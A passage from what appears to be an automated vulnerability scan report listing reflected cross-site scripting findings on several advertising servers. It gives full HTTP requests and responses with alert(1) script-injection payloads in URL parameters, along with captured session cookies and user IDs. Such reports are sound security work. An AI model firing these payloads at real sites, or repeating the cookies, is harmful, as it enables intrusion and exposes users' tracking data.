bh="b!!!%+!!!?H!!!!%<wR0_!!*oY!!!!+<yq][!!-?2!!!!1<yq][!!-G2!!!!$<w[UB!!-O3!!!!%<yq][!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!,<yq][!!0O4!!!!,=!2<(!!0O<!!!!5=!2<(!!0P,!!!!#<x4hf!!1Mv!!!!$<y45e!!2(j!!!!/<whqI!!2a*!!!!#=!4ti!!4Qs!!!!%<wle3!!=cS!!!!'<yV[r!!?VS!!B1c<xl.o!!J<=!!!!2=!2<(!!J<E!!!!2=!2<(!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!,<yq][!!PL`!!!!$<y461!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!Zwb!!!!*<yq][!!`4u!!!!%<y66/!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!3=!2<(!!q:E!!!!0=!2<(!!q<+!!!!1=!2<(!!q</!!!!1=!2<(!!q<3!!!!1=!2<(!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!,<yq][!!ucq!!!!5=!2<(!!vRm!!!!,=!2<(!!vRq!!!!,=!2<(!!vRr!!!!,=!2<(!!vRw!!!!5=!2<(!!vRx!!!!,=!2<(!!vRy!!!!,=!2<(!!w3l!!!!,<yq][!!wQ3!!!!,<yq][!!wQ5!!!!,<yq][!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!,=!2<(!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xa!!!!#=!=SS!#*Xb!!!!#<yMiw!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#1*C!!!!*<yq][!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2XY!!!!,=!2<+!#2YX!!!!#<vl)_!#3<E!!!!$<yr$1!#3=/!!!!#=!28U!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!,=!2<(!#48w!!2s=<xrZD!#5(U!!!!#<x,:<!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!,=!2<(!#6hK!!!!#=!27c!#7.'!!!!,=!2<(!#7.:!!!
!,=!2<(!#7.O!!!!,=!2<(!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#Ie+!!!!#=!27c!#KjQ!!B1c<xl.o!#Km.!!!!#=!27c!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!,=!2<(!#MTF!!!!,=!2<(!#MTH!!!!,=!2<(!#MTI!!!!,=!2<(!#MTJ!!!!,=!2<(!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#O29!!!!*<yq][!#O>d!!C`.<xrYg!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!2=!2<(!#SF3!!!!2=!2<(!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!,=!2<(!#UDP!!!!2=!2<(!#UZs!!!!#<yjEy!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#Z8A!!!!*<yq][!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!%=!$iT!#]9R!!!!#<yq[g!#]@s!!!!%<whqH!#]Z!!!!!*<yq][!#^bt!!!!%<xr]Q!#^d6!!!!%=!$iT!#`-7!!!!*<yq][!#`S2!!!!,<yq][!#`U0!!!!+<yq][!#`U9!!!!*<yq][!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!+<yq][!#a=7!!!!+<yq][!#a=9!!!!+<yq][!#a=P!!!!+<yq][!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!,=!2<(!#ai7!!!!,=!2<(!#ai?!!!!,=!2<(!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=*!!!!#<x,:<!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c8V!!!!*<yq][!#c8W!!!!*<yq][!#c8X!!!!*<yq][!#c8]!!!!*<yq][!#c?c!!!!,=!2<(!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e3[!!!!$<yq][!#e@T!!!!#<ypn:!#eLS!!!!#<yjEE!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG)!!!!*<yq][!#fG+!!!!+<yq][!#ffc!!!!#=!27c!#g=!!!!!*<yq][!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#h.N!!!!#<yMiw!#j9y!!!!#<yq^W!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#n`.!!!!#=!27c!#ne_!!!!*<yq][!#ni8!!!!#<x*cS!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p7'!!!!#<yMiw!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!,=!2<(!#sAb!!!!$<y46(!#sAc!!!!$<y46(!#sC4!!!!$<y46(!#sax!!!!#<xd-C!#tLy!!!!,=!2<(!#tM)!!!!,=!2<(!#tn2!!!!,=!2<(!#uE=!!!!#<x9#K!#uJY!!!!2=!2<(!#uR3!!!!*<yq][!#ujQ!!!!*<yq][!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#vyX!!!!,=!2<(!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wYG!!!!$=!$J$!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!/=!2
<(!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#B>!!!!)<yq][!$#R7!!!!,=!2<(!$#S3!!!!#<y,`,!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!,=!2<(!$(!P!!!!,<yq][!$(+N!!!!#<wGkB!$(Gt!!!!/=!2<(!$(S9!!!!*<yq][!$(Tb!!!!$=!2<E!$(V0!!!!'<ypo5!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)GB!!!!,<yq][!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q!$*hf!!!!*<yq][!$+Du!!!!#=!2<5!$+Rd!!!!#=!2<5"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:46 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Thu, 12 May 2011 12:02:46 GMT
Pragma: no-cache
Content-Length: 4432
Age: 0
Proxy-Connection: close

/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passb
...[SNIP]...
k=0;var rm_tag_type="";rm_pop_frequency = 0; rm_pop_times = 1; rm_pop_nofreqcap = 1; rm_pop_id = 1748713; rm_tag_type = "pop"; rm_url = "http://ad.yieldmanager.com/imp?Z=0x0&anmember=541&anprice=&y=29&ed949"-alert(1)-"308f54cef8d=1&s=1748713&_salt=2823841568";var RM_POP_COOKIE_NAME='ym_pop_freq';var RM_INT_COOKIE_NAME='ym_int_freq';if(!window.rm_crex_data){rm_crex_data=new Array();}if(rm_passback==0){rm_pb_data=new Array();if(
...[SNIP]...

4.78. http://admeld.adnxs.com/usersync [admeld_adprovider_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_adprovider_id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2784'-alert(1)-'79a228804ed was submitted in the admeld_adprovider_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193f2784'-alert(1)-'79a228804ed&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; acb757416=5_[r^XI()vsh<co>bPMvW_l44?enc=AAAAAAAA8D_NzMzMzMzsPwAAAKCZmfk_zczMzMzM7D8AAAAAAADwP0t2I4uVLkAzSsYda6b2ziVhr8pNAAAAAJdIBgA3AQAAMgMAAAIAAABXAgQAfL8AAAEAAABVU0QAVVNEAKAAWAKqAQAAPw8BAgUCAAUAAAAACyF_DAAAAAA.&tt_code=cm.pub_webmd&udj=uf%28%27a%27%2C+9940%2C+1305128822%29%3Buf%28%27c%27%2C+59839%2C+1305128822%29%3Buf%28%27r%27%2C+262743%2C+1305128822%29%3B&cnd=!mhzYQwi_0wMQ14QQGAAg_P4CMAE4qgNAAEiyBlCXkRlYAGDaAWgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABArkBAAAAAAAA8D_BAQAAAAAAAPA_yQGamZmZmZnxP9ABANAB4V0.&ccd=!TQWvKgi_0wMQ14QQGPz-AiAA; uuid2=2724386019227846218; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 11:40:14 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 11:40:14 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:14 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match?admeld_adprovider_id=193f2784'-alert(1)-'79a228804ed&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

4.79. http://admeld.adnxs.com/usersync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://admeld.adnxs.com
Path:   /usersync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56dd9'-alert(1)-'f19d2452188 was submitted in the admeld_callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /usersync?calltype=admeld&admeld_user_id=ac5afe89-dbe3-4a99-9c60-59f4fb495cb9&admeld_adprovider_id=193&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match56dd9'-alert(1)-'f19d2452188 HTTP/1.1
Host: admeld.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxbusiness/300x250/ros?t=1305200290013&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F&refer=http%3A%2F%2Fwww.foxbusiness.com%2Fmarkets%2F2011%2F05%2F03%2Flegendary-deal-maker-ted-forstmann-treated-brain-cancer%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sess=1; icu=ChIIn4MBEAoYAiACKAIwsMeq7gQKEgibiwEQChgDIAMoAzDcyKruBAoSCN--AhAKGAEgASgBMOHequ4EEOHequ4EGBQ.; acb757416=5_[r^XI()vsh<co>bPMvW_l44?enc=AAAAAAAA8D_NzMzMzMzsPwAAAKCZmfk_zczMzMzM7D8AAAAAAADwP0t2I4uVLkAzSsYda6b2ziVhr8pNAAAAAJdIBgA3AQAAMgMAAAIAAABXAgQAfL8AAAEAAABVU0QAVVNEAKAAWAKqAQAAPw8BAgUCAAUAAAAACyF_DAAAAAA.&tt_code=cm.pub_webmd&udj=uf%28%27a%27%2C+9940%2C+1305128822%29%3Buf%28%27c%27%2C+59839%2C+1305128822%29%3Buf%28%27r%27%2C+262743%2C+1305128822%29%3B&cnd=!mhzYQwi_0wMQ14QQGAAg_P4CMAE4qgNAAEiyBlCXkRlYAGDaAWgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABArkBAAAAAAAA8D_BAQAAAAAAAPA_yQGamZmZmZnxP9ABANAB4V0.&ccd=!TQWvKgi_0wMQ14QQGPz-AiAA; uuid2=2724386019227846218; anj=Kfw)(H.Ook)_c8%r9ff]S@h8KANc]mP0h#i:1kZfDLeOJ8#%:'=tMdp)hT=FiVaam_7'jPTW.C%.HxVrFU+@):Ol/][9rD6QF]:$2o$=2t6Ekuw9KB7t>8oBvD:k99t)AUvBQXpMrB.WZ5q$]?qZQ<Vu[#-5^T/x)S7Oq?h<uC6Z'cFlMBT^$(tZTqQER-Qb:5W?g#97-6xWK*4C*9Y>i-@J(yrw^Ur004(6av#+:`V.$%Pg]1DL-tn5$I':[WH#s(nOG69jVj#uUqQEFm_f3-WbrQnxP_drdf#rnuCaB*1I[+NvK[h(c^5Cfj.]G5(':2LiI%%e8#U`X)iJ[4k+(rXIJhdni<)gQjgMUOcN^MOw573KS9ffE$yoAk:>vBb/x@'DVx72K/G/TF_NOLJt[Iy>s!G$dq2Xo:NAZ$7JjL5hQ1Wl:w0(Oa@MM`A:J5wBQuG9jejGeOsVqM1%Tv8OvW0d`NSP4F`8%4q]@s=N3tj7_2rE.]F]824R1O]-r7%W#2%YUAe0vv=@J-XlNPR`5^cw-2hGuDpvfqe=s6vBS!qVDC)at^+-@uA6Zcf)LUf'Vu<UUwffAv@PD(x%bOXCT7ce=h0.JV^-rud6M/nMD2uDe+h%f9jmNXTMyW!I=tuJLUZJ#YJ4>1u!>#NuZ#?6t96[:wU5#1KSrBf*SZTK8<Ta<L772@gT_5e9PMtHS(PR0#:aQJ9n`5j

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 11:40:26 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=2724386019227846218; path=/; expires=Wed, 10-Aug-2011 11:40:26 GMT; domain=.adnxs.com; HttpOnly
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:26 GMT
Content-Length: 183

document.write('<img src="http://tag.admeld.com/match56dd9'-alert(1)-'f19d2452188?admeld_adprovider_id=193&external_user_id=2724386019227846218&expiration=0" width="0" height="0"/>');

4.80. http://ads.adbrite.com/adserver/vdi/742697 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adbrite.com
Path:   /adserver/vdi/742697

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 20743<script>alert(1)</script>2dc6e370893 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserver/vdi/74269720743<script>alert(1)</script>2dc6e370893?d=2931142961646634775 HTTP/1.1
Host: ads.adbrite.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=2931142961646634775&mktid=40&mpid=-1&fpid=-1&rnd=7978057364051197680&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362049x0.049+1303083450x544669068"; cv="1%3Aq1ZyLi0uyc91zUtWslIyyU9OqknPLc9PsUitqDFNLbEyLLRITSm1MrayMC%2FPL1WqBQA%3D"; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Ax6zw%2Cxews%2Clln4%2Cllra%2Cx4co%2Cx4cn%2Cx4cw%2C12gg8%2C12ggb%2C6e73"; rb="0:682865:20838240:null:0:684339:20838240:uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07:0:711384:20861280:c1e1301e-3a1f-4ca7-9870-f636b5f10e66:0:712156:20861280:xrd52zkwjuxh:0:742697:20828160:2931142961646634775:0:753292:20858400:AM-00000000030620452:0:762701:20861280:978972DFA063000D2C0E7A380BFA1DEC:0:779045:20861280:17647108006034089:0:782606:20861280::0:806205:20882880:0c2aede6-6bb6-11e0-8fe6-0025900a8ffe:0:810647:21077280:549188a1-a07c-4231-be94-7f725e1a19f7:0:830697:20838240:9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC:0"; srh="1%3Aq64FAA%3D%3D"; rb2=ChQKBjY4Mjg2NRj0n4jNDiIEbnVsbAo5CgY2ODQzMzkYvo6xlxEiKXV1aWQ9NGRhYjdkMzUtYjFkMi05MTVhLWQzYzAtOWQ1N2Y5YzY2YjA3CjQKBjcxMTM4NBiI_srNEyIkYzFlMTMwMWUtM2ExZi00Y2E3LTk4NzAtZjYzNmI1ZjEwZTY2ChwKBjcxMjE1Nhjo2_vjEyIMeHJkNTJ6a3dqdXhoCiMKBjc0MjY5NxjFp47PDiITMjkzMTE0Mjk2MTY0NjYzNDc3NQokCgY3NTMyOTIYyYemhBYiFEFNLTAwMDAwMDAwMDMwNjIwNDUyCjAKBjc2MjcwMRjVqo2sFiIgOTc4OTcyREZBMDYzMDAwRDJDMEU3QTM4MEJGQTFERUMKIQoGNzc5MDQ1GM_BmeATIhExNzY0NzEwODAwNjAzNDA4OQoWCgY3ODI2MDYQ77DQ1gwYj-zHqhYiAAo0CgY4MDYyMDUYwMmGmRUiJDBjMmFlZGU2LTZiYjYtMTFlMC04ZmU2LTAwMjU5MDBhOGZmZQo0CgY4MTA2NDcYycGHhEQiJDU0OTE4OGExLWEwN2MtNDIzMS1iZTk0LTdmNzI1ZTFhMTlmNwowCgY4MzA2OTcYi9eDzQ4iIDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDEAE; ut="1%3AXZFJloMgFEX3wtgBoKgnu9HYoNJIo0ZD9h4gSR2t6eX%2Bx%2FvwBCsGtyeY2n2TujHgBvTG%2BOKQ4qYoHHIwCcAEMBdNBHdKy17BavWQ9ZY77OrEDINIg1XDOObQOMHgCjJhYvvPUetd3CRKpcfmSZlq5gkiP6%2BTF%2B9H%2BYUa1jLmSW036QqX1%2BmfKP6Ns3zY8yzQBi7s3J7OHh4jvaxE5RmaKbXB4kqguFLGpV9pfqzKR2k0rtnngbgUsbdqym9abDOQa21stM%2BZ904IVzmE7JGYsst5yCLj41ykxWGUwv5bBOElWhM5XZAX9%2FMFIAF1JUSrh%2FiP4PV6Aw%3D%3D"; 
vsd=0@1@4dcaa3a0@d.xp1.ru4.com

Response

HTTP/1.1 400 Bad Request
Accept-Ranges: none
Date: Thu, 12 May 2011 11:41:23 GMT
Server: XPEHb/1.0
Content-Length: 78

Unsupported URL: /adserver/vdi/74269720743<script>alert(1)</script>2dc6e370893

4.81. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the pid request parameter is copied into the HTML document as plain text between tags. The payload 4c3ea<script>alert(1)</script>9e43e26b8da was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1517620&placementId=1517562&pid=8857684c3ea<script>alert(1)</script>9e43e26b8da&ps=-1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:57 GMT
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="http://ads.adsonar.com/w3c/p3p.xml", CP="NOI DSP LAW NID CURa ADMa DEVa TAIo PSAo PSDo OUR SAMa OTRa IND UNI PUR COM NAV INT DEM STA PRE LOC"
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding,User-Agent
Content-Length: 2951


           <!DOCTYPE html PUBLIC "-//W3C//DTD html 4.01 transitional//EN">
           <html>
               <head>
                   <title>Ads by Quigo</title>
                   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>
                   
                   
                                           java.lang.NumberFormatException: For input string: "8857684c3ea<script>alert(1)</script>9e43e26b8da"

   
                                                           </head>
...[SNIP]...

4.82. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the placementId request parameter is copied into an HTML comment. The payload 2ebb1--><script>alert(1)</script>46c8034e10 was submitted in the placementId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /adserving/getAds.jsp?previousPlacementIds=1517620&placementId=15175622ebb1--><script>alert(1)</script>46c8034e10&pid=885768&ps=-1&zw=660&zh=250&url=http%3A//www.foxbusiness.com/markets/2011/05/03/legendary-deal-maker-ted-forstmann-treated-brain-cancer/&v=5&dct=Ted%20Forstmann%20Being%20Treated%20for%20Brain%20Cancer%20-%20FoxBusiness.com&ref=http%3A//dealbook.nytimes.com/2011/05/03/forstmann-is-said-to-be-undergoing-treatment-for-brain-cancer/&metakw=recession,Henry%20Kravis,RJR%20Nabisco,junk%20bonds,Padma%20Lakshmi,FOX%20Business%20Network HTTP/1.1
Host: ads.adsonar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TID=16r4opq1tvlkml; TData=99999%7C51134%7C56281%7C50086%7C50085%7C53380%7C60490%7C60512%7C57149%7C50963%7C52615%7C60491%7C50507%7C53656%7C55401%7C60509%7C54255%7C60506%7C57094%7C54243%7C50961%7C54209%7C52841%7C51182%7C56419%7C56673%7C60146%7C56780%7C56969%7C56835%7C56232%7C56761%7C56768%7C56681%7C54057%7C56148_Mon%2C%2009%20May%202011%2016%3A16%3A53%20GMT

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:39:46 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain
Content-Length: 3512


   <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
   <html>
       <body>
       <!-- java.lang.NumberFormatException: For input string: "15175622ebb1--><script>alert(1)</script>46c8034e10" -->
...[SNIP]...

4.83. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.adsonar.com
Path:   /adserving/getAds.jsp

Issue detail

The value of the ps request parameter is copied into an HTML comment. The payload 7aee0--><script>alert(1)</script>b7befdbe7d1 was submitted in the ps parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

